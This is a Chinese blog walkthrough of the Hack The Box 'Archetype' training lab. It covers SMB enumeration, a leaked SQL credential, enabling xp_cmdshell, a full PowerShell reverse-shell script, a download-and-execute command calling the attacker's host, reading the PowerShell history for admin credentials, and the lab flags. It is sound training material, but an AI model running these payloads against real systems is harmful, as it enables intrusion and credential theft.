[StartingPoint][Tier2]Archetype

2024-04-09 03:36

本文主要是介绍[StartingPoint][Tier2]Archetype,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Task 1

Which TCP port is hosting a database server?

(哪个端口开放了数据库服务)

$ nmap 10.129.95.187 -sC --min-rate 1000

image.png

1433

Task 2

What is the name of the non-Administrative share available over SMB?

(哪个非管理共享提供了SMB?)

$ smbclient -N -L 10.129.95.187

image.png

backups

Task 3

What is the password identified in the file on the SMB share?

(在 SMB 共享中识别的文件中的密码是什么?)

$ smbclient -N //10.129.95.187/backups

>dir

>get prod.dtsConfig

image.png

image.png

M3g4c0rp123

Task 4

What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

(从 Impacket 集合中的哪个脚本可以用于与 Microsoft SQL Server 建立经过身份验证的连接?)

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt

mssqlclient.py

Task 5

What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

(Microsoft SQL Server 的哪个扩展存储过程可以用于生成一个 Windows 命令 shell?)

python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.95.187 -windows-auth

image.png

xp_cmdshell

Task 6

What script can be used in order to search possible paths to escalate privileges on Windows hosts?

(用于搜索可能的路径以提升 Windows 主机权限的脚本是什么)

winpeas

Task 7

What file contains the administrator’s password?

(什么文件中包含的管理员密码?)

使用SELECT is_srvrolemember('sysadmin'); 用来检查当前用户是否属于 sysadmin 角色,即系统管理员角色。如果用户是 sysadmin 角色的成员,该命令将返回 1;否则,返回 0

image.png

没有启用xp_cmdshell

image.png

EXEC sp_configure 'Show Advanced Options', 1;
允许修改高级配置选项

RECONFIGURE;

确认操作

image.png

sp_configure;

查看sp_configure配置

image.png

EXEC sp_configure 'xp_cmdshell', 1;

使用sp_configure系存储过程,启用xp_cmdshell参数,来允许SQL Server调用操作系统命令

RECONFIGURE;

确认操作

image.png

>xp_cmdshell "powershell -c whoami";

image.png

$ vim reverse.txt

$LHOST = "10.10.16.8"; $LPORT = 10032; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

image.png

$ 开启8000端口让服务器下载程序

image.png

> xp_cmdshell "powershell -c (Invoke-Expression (curl http://10.10.16.8:8000/reverse.txt -UseBasicParsing))";

服务端powershell反弹shell

image.png

$ nc -lvp 10032

image.png

image.png

获得了一个低权限用户

type c:\\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

查看历史命令

image.png

ConsoleHost_history.txt

User Flag

powershell 命令快速获取桌面文件命令

Ps>Get-ChildItem -Path "C:\Users\sql_svc\Desktop"

image.png

cmd
> dir "C:\Users\sql_svc\Desktop"

3e7b102e78218e935bf3f4951fec21a3

Root Flag

image.png

b91ccec3305e98240082d4474b848528

解题过程

1.通过smb共享文件获取到敏感文件
2.利用mssqlclient来操作Microsoft SQL进行xp_cmdshell命令执行
3.获取一个普通用户权限,读取Desktop目录下user.txt。这里再利用(c:\\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt)存放的历史命令,成功获取到管理员smb泄露的权限密码
4.将获取到的smb管理员密码,通过psexec进行命令执行,成功提权,读取Desktop下的root.txt

这篇关于[StartingPoint][Tier2]Archetype的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/887076

相关文章

IDEA创建MAVEN项目卡在Generating project in Batch mode以及解决 No archetype found in remote catalog警告问题

解决步骤 1.本地仓库要有archetype-catalog-3.1.2.jar 的jar包 注意:本地仓库jar包的获取可以通过修改settings.xml文件中的mirror从阿里云中加载 网上教程很多 就不赘述了。但是如果修改了setting.xml文件,记得在本地仓库下载完成后将其修改还原。 2.要有archetype-catalog.xml 文件 这个文件的下载,因为被墙的原因下载

MAVEN:自定义模板Archetype的创建

目录 一、简介 二、具体步骤 三、 vscode通过模板创建项目  四、通过IDEA创建 一、简介         有时候MAVEN自带的模板库并不能满足我们创建项目的需求,为了能够快速创建项目,免去每次复杂的配置,所以我们需要自定义模板库,本次操作基于vscode的环境。         在MAVEN的仓库里,有个archetype-catalog.xml文件里面记载了

Maven实战: 从工程创建自定义archetype

在上一节中(创建自定义archetype)我们手动创建了一个项目模板,经过5步能创建出一个项目模板,如果我有一个现成的项目,想用这个项目作为模板来生成其他项目呢?Maven提供了基于项目生成archetype模板的能力,我们分3步来讲解 从项目生成archetype,执行mvn archetype:create-from-project生成archetype安装archetype到仓库使用自定义

Maven实战: 创建自定义archetype

在手动创建SpringBoot应用中,我们讲过手动创建SpringBoot工程是比较麻烦的,尤其是公司内部不有自定义扩展和集成的情况下。利用Maven的archetype:generate能基于项目模板生成功能,自定义模板能让整个创建过程自动化,这样既能大大降低创建和集成SpringBoot的复杂度,还能做到公司内部的标准化。要自定义archetype,需要做7个步骤: 创建archetype的

Idea下Maven开发webapp时候,出现无法解析Maven-archetype-plugin情况

用Idea下Maven开发webapp时候,出现无法解析Maven-archetype-plugin情况,控制台出现如下代码。 [INFO] ------------------------------------------------------------------------ [INFO] BUILD FAILURE [INFO] ---------------------------

IDEA创建maven 一直loading archetype list

原文链接:https://www.cnblogs.com/starlin/p/5223609.html 最近被这个问题坑了很久了,就是用IDEA创建Maven工程还是一直lodading arhtype list,。如下图所示: 在csdn找的到解决方式为删除安装目录C盘下的C:user\XX\.IntelliJIdea15\system中Maven文件夹,删除后创建Maven工程很快 但过

通过mvn archetype 创建一个spring boot start 工程

mvn archetype https://maven.apache.org/archetype/index.html 遇到的问题 对于想自定义一个spring-boot-start的同学,比如 Springboot自定义Starter启动器 整个过程很繁琐。 定义属性开关增加 spring boot test start插件定义自动装载 spring.factories or org.s

eclipse通过maven插件添加Jersey archetype

创建jersey框架archetype如下图所示: 或者webapp项目:

DDD:根据maven的脚手架archetype生成ddd多模块项目目录结构

随着领域驱动的兴起,很多人都想学习如何进行ddd的项目开发,那ddd的项目结构是怎么样的?又是如何结合SpringBoot呢?那么针对这个问题,笔者使用maven的archetype封装一个相对通用的ddd的项目目录,方便一键生成DDD项目目录。 项目地址在文末 archetype项目 archetype项目各种依赖版本要求 1、JDK-172、maven-3.9.63、idea-20

Failed to execute goal org.apache.maven.plugins:maven-archetype-plugin:3.1.1:generate

新建Maven工程报错:Failed to execute goal org.apache.maven.plugins:maven-archetype-plugin:3.1.1:generate  问题原因是没有跳过测试,解决方法有两种: 一:命令行 mvn clean package -Dmaven.test.skip=true 二:在pom文件中配置 <plugin>